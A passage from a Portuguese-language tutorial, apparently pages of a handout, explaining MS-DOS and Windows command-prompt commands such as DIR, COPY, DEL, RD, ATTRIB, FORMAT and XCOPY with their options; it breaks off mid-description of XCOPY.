  • 61. Comandos do MS-DOS Este tutorial tem por objetivo mostrar os comandos do DOS. Muitas pessoas pensam que são "inúteis", mas caso ocorra alguma emergência no PC você irá precisar destes comandos então vai... 1. Diferenças entre comandos internos e externos Os comandos internos podem ser executados em qualquer pasta no PC e a qualquer momento pois estão embutidos no DOS. Os comandos externos são programas utilitários que acompanham o sistema operacional e que só podem ser executados onde estão localizados, ou seja, no drive onde foram gravados. Este tutorial está dividido em 2 partes: comandos internos e comandos externos. 2. Os comandos internos Nos comandos internos pode-se saber mais informações acerca do mesmo, digitando /? após o comando, ex.: dir/?, você irá receber informações sobre o comando dir, os comandos internos são os mais úteis em emergências já que podem ser executados em qualquer lugar; agora, vamos aos comandos. Comando DATE Esse comando, como o nome já diz, mostra na tela a data atual, permitindo a sua modificação. O comando DATE deverá ser usado da seguinte maneira: date [opções] (Sem os colchetes), sendo que não é necessária a utilização das opções caso você não queira. Ex.: Digitando date, irá aparecer: Data atual: sáb 28/06/2003 Digite a nova data: (dd-mm-aa) Opções: /t - Informa a data mas não solicita uma nova. Comando TIME Esse comando faz a mesma coisa que o comando DATE mas ao invés de mudar a data ele muda a hora: esse comando mostra hora, minutos, segundos e centésimos de segundo. O comando TIME deverá ser usado da seguinte maneira: Time [opções] (Sem os colchetes), sendo que não é necessária a utilização das opções caso você não queira. Ex.: Digitando time, irá aparecer: Hora Atual: 17:01:20,98 Digite a nova Hora: Opções: /t - Informa a hora mas não solicita uma nova. Comando VER Esse comando mostra qual sistema operacional você está usando. Ex.: Digitando ver, irá aparecer: 61
  • 62. Microsoft Windows XP [versão 5.1.2600] Comando CLS Esse comando limpa a tela e posiciona o cursor no canto superior esquerdo da tela. Comando Dir O comando dir é muito famoso e quase todos já conhecem: ele mostra todos arquivos e pastas de um diretório e busca arquivos em um drive especificado. O comando DIR é usado da seguinte maneira: dir [drive:][caminho] arquivo(s) [opções] (Sem os colchetes) sendo que não é necessária a utilização das opções caso você não queira nem de arquivo(s). Opções: /p - A listagem pára toda vez que atinge o fim da tela, sendo necessário que se pressione qualquer tecla para continuar. /b - Mostra somente as informações básicas. /c - Mostra o separador de milhar no tamanho dos arquivos. /w - Exibe a lista na horizontal, onde são mostrados 5 arquivos por linha. /d - O mesmo que /w, só que mostra a lista em colunas. /s - Exibe os arquivos de todos os subdiretórios. /l - Usa letras minúsculas. /n - Formato de lista longa em que os nomes dos arquivos ficam na extrema direita. /q - Mostra o nome do dono do arquivo. /4 - Exibe anos de 4 dígitos. /t:campo- Controla qual campo de tempo é exibido ou usado na classificação onde campo deve ser substituído por um desses caracteres e não devem ser digitados os 2 pontos (. C - Criação. A - Último acesso. W - Última gravação. /o:ordem – Mostra os arquivos em uma ordem, onde ordem deve ser substituída por um desses caracteres e não devem ser digitados os 2 pontos (. N - Nome do arquivo seguido pela extensão. S - Tamanho do arquivo. D - Ordem cronológica. G - Grupos de arquivos de subdiretórios. /a:atributo – Mostra somente arquivos de determinado atributo, onde atributo deve ser substituído por algum desses caracteres e não devem ser digitados os 2 pontos (. D – Nome do arquivo seguido pela extensão. R – Arquivos somente leitura. H – Arquivos ocultos . Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-) Ex.: Dir /a-h, mostra todos os arquivos menos os arquivos ocultos. Comando COPY O comando COPY copia um determinado arquivo ou o disco inteiro, sendo que caso exista algum arquivo no destino com o mesmo nome do arquivo de origem, esse arquivo será substituído. O COPY deve ser usado da seguinte maneira: copy [drive:] [caminho] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira. 62
  • 63. Opções: /v - Verifica o arquivo de destino após a cópia, esta opção deixa o copy mais lento. /a - Indica um arquivo de texto ASCII. /b - Indica um arquivo binário. /d - Permite que o arquivo de destino seja criado descriptografado. /n - Usa um nome de arquivo curto (Padrão 8.3), caso copie um arquivo fora deste padrão. /y - Não pede confirmação para que você substitua um arquivo de destino já existente. /-y - Pede confirmação para que você substitua um arquivo de destino já existente. /z - Copia arquivos de rede no modo reiniciável. Comando TYPE Mostra o conteúdo de um arquivo (somente um por vez e não aceita caracteres curinga). Comando REN ou RENAME Renomeia o arquivo. Pode-se também alterar a extensão do mesmo. Ex.: Ren Arquivo.txt Backup.bak, Isto renomeia o arquivo: Arquivo.txt, para Backup.bak. Comando DEL ou ERASE Apaga arquivos do disco rígido e deve ser usado da seguinte maneira: del [drive:][caminho] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira. Opções: /p - Força a mensagem de confirmação "Apagar( S / N )?". /f - Força a exclusão de arquivos somente leitura. /s - Exclui arquivos de todas as subpastas. /q - Modo silencioso, não pede confirmação para excluir um caractere curinga global. /a:atributo - Exclui somente arquivos de determinado atributo, onde atributo deve ser substituído por algum desses caracteres e não devem ser digitados os 2 pontos (. S - Arquivos de sistema. R - Arquivos somente leitura. H - Arquivos ocultos. A - Arquivos prontos para arquivamento. Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-). Ex.: Del *.* /a-h, executando este comando, você exclui todos os arquivos menos os arquivos ocultos da pasta. Comando MD ou MKDIR Cria uma pasta, devendo ser usado da seguinte maneira: MD Pasta, onde Pasta é o nome da pasta que você quer criar. Comando CD ou CHDIR Entra ou sai de uma pasta: se você digitar CD TESTE, por exemplo, ele entrará na pasta TESTE. Se você digitar CD.. ele irá voltar para a pasta anterior. O mesmo vale para o CHDIR. Comando RD ou RMDIR Remove uma pasta que esteja vazia, sendo que não consegue remover pastas com arquivos. Deve ser usado da seguinte maneira: rd [opções] (Sem colchetes), sendo que não é necessária a utilização das opções caso você não queira. Ex.: Digitando RD Teste você irá excluir a pasta teste. 63
  • 64. Opções: /s - Remove todas as pastas e arquivos da pasta, além dela mesma. /q - Modo silencioso, não pede confirmação para remover a árvore de pastas quando usado com /s. 2. Os comandos externos Assim como nos comandos internos pode-se usar o comando auxiliar /?, dentre os comandos externos, alguns são muito úteis, como o format veremos logo adiante... Comando ATTRIB O Attrib altera ou mostra os atributos de um arquivo, devendo ser usado da seguinte maneira: attrib [Atributo] [drive:][caminho] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira. Opções do "Atributo" dos colchetes: + Ativa um atributo. - Desativa um atributo. r - Atributo de arquivo somente leitura. a - Atributo de arquivo de leitura/gravação. s- Atributo de arquivo de sistema. h - Atributo de arquivo oculto. Opções: /s - Processa os arquivos da pasta atual. /d - Inclui pastas. Comando FORMAT Como o nome já diz, ele formata o drive. Deve ser usado da seguinte maneira: format [drive:] [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira. Opções: /fs:sistema de arquivos - Formata a partição como fat32, fat ou ntfs, é necessário substituir "sistema de arquivos", por fat32, fat ou ntfs. /v:nome - Formata a partição com um nome de volume específico. /q - Formatação rápida (Tão rápida quanto a formatação de um disquete). /c - Arquivos criados na partição serão compactados (somente com partições ntfs). /x - Força primeiro a desmontagem do volume, se necessário. Todos os identificadores abertos no volume não seriam mais válidos. /f:tamanho - Especifica o tamanho do disquete a ser formatado (Em formatações de disquete, claro). /t:trilhas - Especifica o número de trilhas por lado do disco. /n:setores- Especifica o número de setores por trilha. Comando DISKCOPY O comando DISKCOPY copia o conteúdo de um disco flexível para outro, sendo que eles devem ter o mesmo tamanho e densidade. Deve ser usado da seguinte maneira: diskcopy [drive de origem:] [drive de destino:] [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira. Opções: /v – Verifica os arquivos copiados após a cópia. Comando XCOPY O comando xcopy copia arquivos de um ou mais subdiretórios. Também pode copiar os subdiretórios, mas não copia arquivos de sistema ou ocultos, devendo ser usado da seguinte maneira: xcopy [drive:][caminho] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira. Opções: /d - Copia arquivos que foram modificados a partir de uma certa data. /p - Pede confirmação para cópia de cada arquivo. /s - Copia diretórios e subdiretórios (Não copia pastas vazias). /e/s - Copia os subdiretórios mesmo que estejam vazios. /v - Verifica os 64